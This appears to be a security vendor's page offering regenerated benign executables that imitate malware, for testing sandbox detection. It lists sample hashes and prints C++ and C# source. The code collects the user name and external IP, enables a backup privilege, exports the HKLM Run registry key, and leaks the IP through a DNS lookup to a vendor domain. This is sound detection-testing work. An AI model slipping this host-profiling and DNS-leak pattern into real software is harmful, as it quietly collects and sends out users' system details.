Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPS to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_cpayne_1736932652.exe | a54390dd8aa4804c596e9dbb96a3aa08 | January 15 2025 09:17:33 GMT | 4775532 bytes |
malware_eicar_cpayne_1736932631.exe | 85855656b0d8ac1224b913bf78031fac | January 15 2025 09:17:12 GMT | 4775532 bytes |
malware_eicar_cpayne_1736932611.exe | 3a5218a9c9db114726d4ed9ba043d153 | January 15 2025 09:16:52 GMT | 4775532 bytes |
malware_eicar_cpayne_1736915302.exe | d90737589230971ee045427390d0ba41 | January 15 2025 04:28:23 GMT | 4775532 bytes |
malware_eicar_cpayne_1736845146.exe | baeb3027cb880cf0a8ed136514d1e4b3 | January 14 2025 08:59:07 GMT | 4775532 bytes |
malware_eicar_cpayne_1736799360.exe | 943d0dfc5b846f32aaced62642f81d97 | January 13 2025 20:16:01 GMT | 4775532 bytes |
malware_eicar_cpayne_1736780074.exe | 0a5c452ba3a7bd962de44e1685eca9c0 | January 13 2025 14:54:35 GMT | 4775532 bytes |
malware_eicar_cpayne_1736746737.exe | 1f3da99260cabc04f90ee99c8604e6fe | January 13 2025 05:38:58 GMT | 4775532 bytes |
malware_eicar_cpayne_1736737371.exe | 5bd5189a427c2952582cbb5c8c01517f | January 13 2025 03:02:52 GMT | 4775532 bytes |
malware_eicar_cpayne_1736737360.exe | 556b2da375ccf8e742d8bf9f2297f70f | January 13 2025 03:02:41 GMT | 4775532 bytes |
> #cat /path/malware_eicar.cs
/*
MAATrigger-Payload - John Payne
------------------------
Windows C++ executable - once executed it will perform the following,
closely matching the original C# code. Targeted at Windows 7+ operating systems.
What this code does:
- Gain privs to allow registry access
- Connects to bot.whatismyipaddress.com and gets the external IP
- Get current Windows user
- Write IP and Windows user to file (current DIR\drop.txt)
- Export registry keys to file (current DIR\export.reg)
- Create mutex "1234-7" - red flag in MAA
- Sleep for 60000ms
*/
// NOTE(review): the page's markup stripped the <...> argument from three
// #include lines; the header names below are reconstructed from what the
// code uses (iostream/fstream for cout/ofstream, winsock2 for sockets).
#include <winsock2.h>  // must come before windows.h, which otherwise pulls in the old winsock.h
#include "windows.h" // C++ Windows API
#include <cstdio>
#include <cstring>
#include <fstream>
#include <iostream>
#pragma comment(lib, "Ws2_32.lib") // winsock2 libary
using namespace std;
bool gainPriv();
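/* Entry point of the benign detonation sample. Runs, in order: enable
   SeBackupPrivilege, fetch the external IP over plain HTTP, read the current
   user name, drop drop.txt, export the autorun Run key to export.reg, create
   the named mutex "1234-7", then idle for 60 s. Every step is best-effort and
   logs its outcome to stdout; the process always returns 0.

   Fixes relative to the original: GetUserNameA was told the buffer held 512
   bytes when it held 128 (heap/stack overflow), recvBuf was never
   NUL-terminated, the socket/registry/mutex handles were leaked, RegSaveKeyEx
   ran on an unopened key when RegOpenKeyEx failed, and ReleaseMutex was called
   on a NULL handle. */
int main() {
    cout << "Blessings Payload Application\n";

    /* Enable SeBackupPrivilege so the registry export below can succeed.
       AdjustTokenPrivileges can only enable privileges the token already
       holds, so this is not an escalation for a locked-down user.
       ------------------------------------------------------------------*/
    cout << "Escalating privileges if possible...\n";
    if (gainPriv()) {
        cout << "Privileges escalated successfully.\n";
    }
    else {
        cout << "Could not escalate privileges. Likely running as locked down user with limited OS access, or other security mechanisms in place.\n";
    }

    /* Fetch the external IP over plain HTTP. recvBuf ends up holding the last
       chunk of the raw HTTP response (headers included, not a parsed address),
       or stays empty if any Winsock step fails.
       ------------------------------------------------------------------ */
    char request[] = "GET / HTTP/1.0\r\nHost: bot.whatismyipaddress.com\r\nUser-Agent: Blessings\r\nConnection: Close\r\n\r\n";
    char recvBuf[512] = "";

    WSADATA wsaData;
    int err = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (err != 0) {
        cout << "WSAStartup failed: " << err << endl;
    }
    else {
        sockaddr_in serverInfo = {};
        serverInfo.sin_family = AF_INET;
        // bot.whatismyipaddress.com — hard-coded address; if the host's DNS record
        // changes this connect fails and the drop file carries an empty IP.
        serverInfo.sin_addr.s_addr = inet_addr("66.171.248.178");
        serverInfo.sin_port = htons(80);

        SOCKET sockfd = ::socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd == INVALID_SOCKET) {
            cout << "socket() failed: " << WSAGetLastError() << endl;
        }
        else {
            if (::connect(sockfd, reinterpret_cast<SOCKADDR*>(&serverInfo), sizeof(serverInfo)) == SOCKET_ERROR) {
                cout << "connect() failed: " << WSAGetLastError() << endl;
            }
            else if (::send(sockfd, request, static_cast<int>(strlen(request)), 0) == SOCKET_ERROR) {
                cout << "send() failed: " << WSAGetLastError() << endl;
            }
            else {
                // recv loop; the server *should* honour Connection: close so this stays
                // simple. One byte is held back so the chunk can always be NUL-terminated.
                do {
                    err = recv(sockfd, recvBuf, sizeof(recvBuf) - 1, 0);
                    if (err > 0) {
                        recvBuf[err] = '\0';
                        cout << "Recieved " << err << "OK.\n";
                    }
                    else if (err == 0) {
                        cout << "Connection gracefully closed.\n";
                    }
                    else {
                        cout << "Something went wrong with recv()\n";
                    }
                } while (err > 0);
            }
            closesocket(sockfd);
        }
        WSACleanup();
    }

    /* Get Windows Username
       ------------------------------------------------------------------*/
    char currentUser[128];
    DWORD userSize = sizeof(currentUser);  // in/out size must match the buffer (the original passed 512)
    if (GetUserNameA(currentUser, &userSize) == 0) {
        cout << "Error with username: " << GetLastError() << endl;
        currentUser[0] = '\0';  // never print or write an uninitialised buffer
    }
    cout << "Current user is " << currentUser << endl;

    /* Write IP and username to a file in the current directory
       ------------------------------------------------------------------*/
    ofstream outFile("drop.txt", ios::out);
    if (!outFile) {
        cout << "Failed to open drop.txt for writing.\n";
    }
    else {
        outFile << "Dropped by MAATrigger-Payload\nUsername: " << currentUser << endl;
        outFile << "External IP: " << recvBuf << endl;
    }
    outFile.close();

    /* Read the autorun Run key and export it to current DIR\export.reg.
       The save only runs when the open succeeded, and the key is closed after.
       ------------------------------------------------------------------*/
    HKEY keyResult = NULL;
    LONG lresult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_READ, &keyResult);
    if (lresult == ERROR_SUCCESS) {
        cout << "Opened key OK.\n";
        // RegSaveKeyEx requires SeBackupPrivilege (what gainPriv enables) and
        // fails if export.reg already exists from a previous run.
        LONG saveResult = RegSaveKeyEx(keyResult, TEXT("export.reg"), NULL, REG_STANDARD_FORMAT);
        if (saveResult == ERROR_SUCCESS) {
            cout << "Saved keys OK.\n";
        }
        else {
            cout << "Failed to save keys. Error " << saveResult << endl;
        }
        RegCloseKey(keyResult);
    }
    else {
        cout << "Failed to open key.\n";
    }

    /* Create the named Windows mutex. CreateMutexA is used explicitly because
       the name is a narrow literal and the rest of the file uses TEXT().
       ------------------------------------------------------------------*/
    HANDLE mytex = CreateMutexA(NULL, TRUE, "1234-7");
    if (mytex == NULL) {
        cout << "Error creating mutex.\n";
    }
    else {
        cout << "Mutex created OK.\n";
        ReleaseMutex(mytex);  // drop ownership; the handle stays open so the name exists while we idle
    }

    /* Idle for 60 seconds
       ------------------------------------------------------------------*/
    Sleep(60000);

    if (mytex != NULL) {
        CloseHandle(mytex);
    }
    // all done!
    return 0;
}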
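/* Enable SeBackupPrivilege on the current process token so RegSaveKeyEx can
   write the registry export.

   Returns true only when the privilege is actually enabled. AdjustTokenPrivileges
   reports success even when the token does not hold the privilege, signalling
   that case via GetLastError() == ERROR_NOT_ALL_ASSIGNED; the original ignored
   this and reported success falsely. The token handle is now closed on every
   path (the original leaked it when AdjustTokenPrivileges failed).

   Note: this can only enable a privilege the token already holds; it cannot
   grant one, so for a locked-down user it returns false. */
bool gainPriv() {
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        cout << "Failed OpenProcessToken.\n";
        return false;
    }

    LUID luid;
    if (!LookupPrivilegeValue(NULL, SE_BACKUP_NAME, &luid)) {
        printf("Failed LookupPrivilegeValue\n");
        CloseHandle(hToken);
        return false;
    }

    TOKEN_PRIVILEGES newState = {};
    newState.PrivilegeCount = 1;
    newState.Privileges[0].Luid = luid;
    newState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Adjust the token privilege; the BOOL result alone is not enough, see header.
    bool enabled = AdjustTokenPrivileges(hToken, FALSE, &newState, 0, NULL, NULL) != 0;
    if (!enabled) {
        printf("Failed AdjustTokenPrivileges\n");
    }
    else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        printf("SeBackupPrivilege is not held by this token.\n");
        enabled = false;
    }

    CloseHandle(hToken);
    return enabled;
}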
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPS to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_csharp_1736932655.exe | 8a15aa4c2b9a603f9bc0f72dbfff3aa2 | January 15 2025 09:17:35 GMT | 5120 bytes |
malware_eicar_csharp_1736932634.exe | c74a4a109f04b5f98734c40b50417927 | January 15 2025 09:17:14 GMT | 5120 bytes |
malware_eicar_csharp_1736932613.exe | 633292da09aad7f8e1178d46e81e9af8 | January 15 2025 09:16:54 GMT | 5120 bytes |
malware_eicar_csharp_1736915309.exe | 1b40bf5d70609a0d4f18f6597196e53d | January 15 2025 04:28:30 GMT | 5120 bytes |
malware_eicar_csharp_1736845140.exe | 3f07b6956d09b4155b6f8d52cd8444c2 | January 14 2025 08:59:00 GMT | 5120 bytes |
malware_eicar_csharp_1736807361.exe | f5d43ac1993cdaca9763583427546760 | January 13 2025 22:29:21 GMT | 5120 bytes |
malware_eicar_csharp_1736780053.exe | 2c502e18709a2757556c863d2e947ad3 | January 13 2025 14:54:14 GMT | 5120 bytes |
malware_eicar_csharp_1736746723.exe | d609d31a11d133d777c030cc22cd4e98 | January 13 2025 05:38:44 GMT | 5120 bytes |
malware_eicar_csharp_1736737393.exe | a6df0fe2ebf253f76b08cde3949e6159 | January 13 2025 03:03:14 GMT | 5120 bytes |
malware_eicar_csharp_1736737350.exe | 02cbc8ec4c1a2b0b04750c25e92b1ea4 | January 13 2025 03:02:31 GMT | 5120 bytes |
> #cat /path/malware_eicar.cs
using System;
using System.Net;
using System.Web;
using System.Text;
using System.Text.RegularExpressions;
using System.Diagnostics;
using System.ComponentModel;
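namespace blessings.Mono.Eicar
{
    /// <summary>
    /// Benign detonation sample. Performs, in sequence, a set of actions that
    /// behavioural sandboxes are expected to flag: an HTTP request to an IP
    /// lookup service, two dropped files in the working directory, an export of
    /// the HKLM Run key via regedit, a DNS lookup of a name derived from the
    /// fetched IP, and a named mutex "1234-7". It then waits for input and idles.
    /// Only the dropped files (scraped_info.txt, fake_rasauto32.dll, export.reg)
    /// are written to the host.
    /// </summary>
    public class HelloMalware
    {
        /// <summary>Entry point; runs each test action in order. Exceptions are not caught.</summary>
        public static void Main(string[] args)
        {
            Console.Write("I'm up to no good");
            Console.Write("dynamic=ffc89310d674302ab4c8745409994bf9"); //Hash derived from system clock to keep exe hash changing

            // WebClient is IDisposable; the original never disposed it.
            string myIpText;
            using (WebClient webClient = new WebClient())
            {
                byte[] myIp = webClient.DownloadData("http://bot.whatismyipaddress.com/");
                myIpText = System.Text.Encoding.Default.GetString(myIp);
            }
            string currentUser = System.Security.Principal.WindowsIdentity.GetCurrent().Name;

            // The original allocated five slots and filled two, so the drop file
            // ended with three empty lines; only the populated values are written now.
            string[] output = { myIpText, currentUser };
            System.IO.File.WriteAllLines(@"./scraped_info.txt", output);
            System.IO.File.WriteAllText(@"./fake_rasauto32.dll", ":)");
            Export(@".\export.reg", @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run");

            // The DNS lookup itself is the observable event; its result was never used.
            Dns.GetHostEntry(myIpText + ".infected.7blessings.co.uk");

            // The mutex handle stays open while idling so the name remains visible,
            // and is released on exit instead of leaked.
            using (System.Threading.Mutex mutey = new System.Threading.Mutex(false, "1234-7"))
            {
                Console.Write(System.Environment.NewLine + "Finished");
                Console.ReadLine();
                System.Threading.Thread.Sleep(60000);
            }
        }

        /// <summary>
        /// Exports <paramref name="registryPath"/> to <paramref name="exportPath"/>
        /// by running <c>regedit.exe /e</c> and waiting for it to finish.
        /// Best-effort, as in the original: any exception is swallowed. The Process
        /// handle is now released on every path (the original created one Process,
        /// set StartInfo on it, then discarded it by calling the static Process.Start,
        /// and only disposed on the exception path).
        /// </summary>
        /// <param name="exportPath">Destination .reg file. Wrapped in double quotes verbatim, so it must not itself contain '"'.</param>
        /// <param name="registryPath">Registry key to export. Same quoting restriction.</param>
        private static void Export(string exportPath, string registryPath)
        {
            string path = "\"" + exportPath + "\"";
            string key = "\"" + registryPath + "\"";
            try
            {
                using (Process proc = Process.Start("regedit.exe", "/e " + path + " " + key))
                {
                    // Process.Start returns null when no new process was started.
                    if (proc != null)
                    {
                        proc.WaitForExit();
                    }
                }
            }
            catch (Exception)
            {
                // Deliberately swallowed: the export is a test signal, not a requirement.
            }
        }
    }
}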
Many thanks to https://github.com/a0rtega/pafish for your work!
A generated, 100% benign compiled exe that mimics the behavioural actions of genuine malware. Because a new sample is generated frequently, its hash should not already be known to any security tool.
This tool differs from the above in that it detonates in a Sandbox rather than the full iVM, making it ideal for testing and demonstrating MASS.
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Demonstrate security delivered to devices using a Cloud proxy
* Use over HTTPS to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
pafish_appendedepoch_1736932669.exe | 937cc3579411bd65a46c070c401b999c | January 15 2025 09:17:48 GMT | 76811 bytes |
pafish_appendedepoch_1736932648.exe | 593ea861b0ad0220833eb0de8054753f | January 15 2025 09:17:28 GMT | 76811 bytes |
pafish_appendedepoch_1736932628.exe | 9e0d797fd3e782608f3c1fbdd7011378 | January 15 2025 09:17:08 GMT | 76811 bytes |
pafish_appendedepoch_1736925939.exe | 1c8cdb9847601ec4f1375f10c4015201 | January 15 2025 07:25:39 GMT | 76811 bytes |
pafish_appendedepoch_1736925106.exe | 2c374177c810230485f45d41d79f1ca1 | January 15 2025 07:11:46 GMT | 76811 bytes |
pafish_appendedepoch_1736915375.exe | 814f8c7fd7394059dc6a19ab18e15763 | January 15 2025 04:29:35 GMT | 76811 bytes |
pafish_appendedepoch_1736910402.exe | 4f6b2be8b0759a9a0a195da95a8cb8e1 | January 15 2025 03:06:42 GMT | 76811 bytes |
pafish_appendedepoch_1736910053.exe | 7cae7431da557b0952deff701c377dd3 | January 15 2025 03:00:53 GMT | 76811 bytes |
pafish_appendedepoch_1736908677.exe | 83e30198af8962d336df869eec8ccf57 | January 15 2025 02:37:57 GMT | 76811 bytes |
pafish_appendedepoch_1736908674.exe | 892f5d5a62557dedb8c4d997cf5f4de6 | January 15 2025 02:37:54 GMT | 76811 bytes |